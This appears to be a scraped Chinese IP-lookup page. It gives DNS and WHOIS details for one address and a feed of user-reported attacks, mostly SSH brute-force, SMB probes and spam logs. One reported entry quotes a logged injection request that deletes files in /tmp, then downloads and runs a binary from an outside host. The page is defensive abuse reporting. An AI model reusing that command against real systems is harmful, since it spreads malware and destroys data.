必须是合法有效的IP地址, 可以是IPv4或者是IPv6, 例如127.0.0.1或者2001:DB8:0:0:8:800:200C:417A
基本信息:

城市(city): unknown

省份(region): unknown

国家(country): United States

运营商(isp): unknown

主机名(hostname): unknown

机构(organization): unknown

使用类型(Usage Type): unknown

用户上报:
暂无关于此IP的讨论, 沙发请点上方按钮
相同子网IP讨论:
暂无关于此IP所属子网相关IP的讨论.
WHOIS信息:
b
DIG信息:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 75.145.49.118
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 19565
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;75.145.49.118.			IN	A

;; AUTHORITY SECTION:
.			339	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2022011002 1800 900 604800 86400

;; Query time: 57 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Tue Jan 11 07:23:58 CST 2022
;; MSG SIZE  rcvd: 106
HOST信息:
118.49.145.75.in-addr.arpa domain name pointer 75-145-49-118-Nashville.hfc.comcastbusiness.net.
NSLOOKUP信息:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
118.49.145.75.in-addr.arpa	name = 75-145-49-118-Nashville.hfc.comcastbusiness.net.

Authoritative answers can be found from:
相关IP信息:
最新评论:
IP 类型 评论内容 时间
196.25.35.242 attackbotsspam
Unauthorized connection attempt from IP address 196.25.35.242 on Port 445(SMB)
2020-06-02 02:35:35
91.149.235.200 attack
Jun  1 21:41:28 our-server-hostname postfix/smtpd[15982]: connect from unknown[91.149.235.200]
Jun x@x
Jun x@x
Jun x@x
Jun x@x
Jun x@x
Jun x@x
Jun x@x
Jun x@x
Jun x@x
Jun x@x
Jun  1 21:41:33 our-server-hostname postfix/smtpd[15982]: too many errors after DATA from unknown[91.149.235.200]
Jun  1 21:41:33 our-server-hostname postfix/smtpd[15982]: disconnect from unknown[91.149.235.200]


........
-----------------------------------------------
https://www.blocklist.de/en/view.html?ip=91.149.235.200
2020-06-02 02:49:42
218.92.0.172 attack
Jun  1 20:12:58 h1745522 sshd[26876]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.172  user=root
Jun  1 20:13:00 h1745522 sshd[26876]: Failed password for root from 218.92.0.172 port 29239 ssh2
Jun  1 20:13:03 h1745522 sshd[26876]: Failed password for root from 218.92.0.172 port 29239 ssh2
Jun  1 20:12:58 h1745522 sshd[26876]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.172  user=root
Jun  1 20:13:00 h1745522 sshd[26876]: Failed password for root from 218.92.0.172 port 29239 ssh2
Jun  1 20:13:03 h1745522 sshd[26876]: Failed password for root from 218.92.0.172 port 29239 ssh2
Jun  1 20:12:58 h1745522 sshd[26876]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=218.92.0.172  user=root
Jun  1 20:13:00 h1745522 sshd[26876]: Failed password for root from 218.92.0.172 port 29239 ssh2
Jun  1 20:13:03 h1745522 sshd[26876]: Failed password for root fr
...
2020-06-02 02:19:06
176.121.237.61 attackbots
Unauthorized connection attempt from IP address 176.121.237.61 on Port 445(SMB)
2020-06-02 02:34:16
110.232.80.209 attackbots
/shell%3Fcd+/tmp;rm+-rf+*;wget+185.172.111.214/bins/UnHAnaAW.x86;chmod+777+/tmp/UnHAnaAW.x86;sh+/tmp/UnHAnaAW.x86
2020-06-02 02:23:08
151.45.218.183 attackbotsspam
Unauthorized connection attempt from IP address 151.45.218.183 on Port 445(SMB)
2020-06-02 02:44:26
141.98.9.159 attack
Bruteforce detected by fail2ban
2020-06-02 02:43:32
194.26.29.50 attackbotsspam
Jun  1 20:26:02 debian-2gb-nbg1-2 kernel: \[13294732.456809\] \[UFW BLOCK\] IN=eth0 OUT= MAC=96:00:00:0e:18:f4:d2:74:7f:6e:37:e3:08:00 SRC=194.26.29.50 DST=195.201.40.59 LEN=40 TOS=0x00 PREC=0x00 TTL=241 ID=42891 PROTO=TCP SPT=58878 DPT=2244 WINDOW=1024 RES=0x00 SYN URGP=0
2020-06-02 02:27:28
112.199.200.235 attackbots
SSH Attack
2020-06-02 02:50:03
190.122.220.222 attack
Unauthorized connection attempt from IP address 190.122.220.222 on Port 445(SMB)
2020-06-02 02:38:30
103.16.202.160 attackbots
Port scan: Attack repeated for 24 hours
2020-06-02 02:19:59
41.216.182.145 attack
Jun  1 13:42:57 mxgate1 postfix/postscreen[25737]: CONNECT from [41.216.182.145]:17619 to [176.31.12.44]:25
Jun  1 13:42:57 mxgate1 postfix/dnsblog[25746]: addr 41.216.182.145 listed by domain zen.spamhaus.org as 127.0.0.3
Jun  1 13:43:03 mxgate1 postfix/postscreen[25737]: DNSBL rank 2 for [41.216.182.145]:17619
Jun x@x
Jun  1 13:43:07 mxgate1 postfix/postscreen[25737]: DISCONNECT [41.216.182.145]:17619


........
-----------------------------------------------
https://www.blocklist.de/en/view.html?ip=41.216.182.145
2020-06-02 02:37:39
187.32.140.225 attack
Honeypot attack, port: 445, PTR: 187-032-140-225.static.ctbctelecom.com.br.
2020-06-02 02:19:23
78.217.177.232 attackbotsspam
Jun  1 15:42:07 ns382633 sshd\[22404\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=78.217.177.232  user=root
Jun  1 15:42:09 ns382633 sshd\[22404\]: Failed password for root from 78.217.177.232 port 55836 ssh2
Jun  1 16:04:00 ns382633 sshd\[26251\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=78.217.177.232  user=root
Jun  1 16:04:03 ns382633 sshd\[26251\]: Failed password for root from 78.217.177.232 port 36732 ssh2
Jun  1 16:07:50 ns382633 sshd\[27139\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=78.217.177.232  user=root
2020-06-02 02:25:54
41.216.181.211 attackbotsspam
Jun  1 13:43:27 mxgate1 postfix/postscreen[25737]: CONNECT from [41.216.181.211]:60265 to [176.31.12.44]:25
Jun  1 13:43:27 mxgate1 postfix/dnsblog[25741]: addr 41.216.181.211 listed by domain zen.spamhaus.org as 127.0.0.3
Jun  1 13:43:33 mxgate1 postfix/postscreen[25737]: DNSBL rank 2 for [41.216.181.211]:60265
Jun x@x


........
-----------------------------------------------
https://www.blocklist.de/en/view.html?ip=41.216.181.211
2020-06-02 02:44:56

最近上报的IP列表

52.21.184.77 106.7.25.220 160.53.193.184 36.3.110.201
214.157.35.92 161.180.19.9 78.21.132.114 118.213.174.249
232.167.14.170 151.101.1.7 139.168.168.28 250.160.241.103
179.231.163.196 40.89.44.111 195.129.127.107 63.67.245.245
25.137.158.76 4.26.252.157 171.150.99.243 221.67.230.29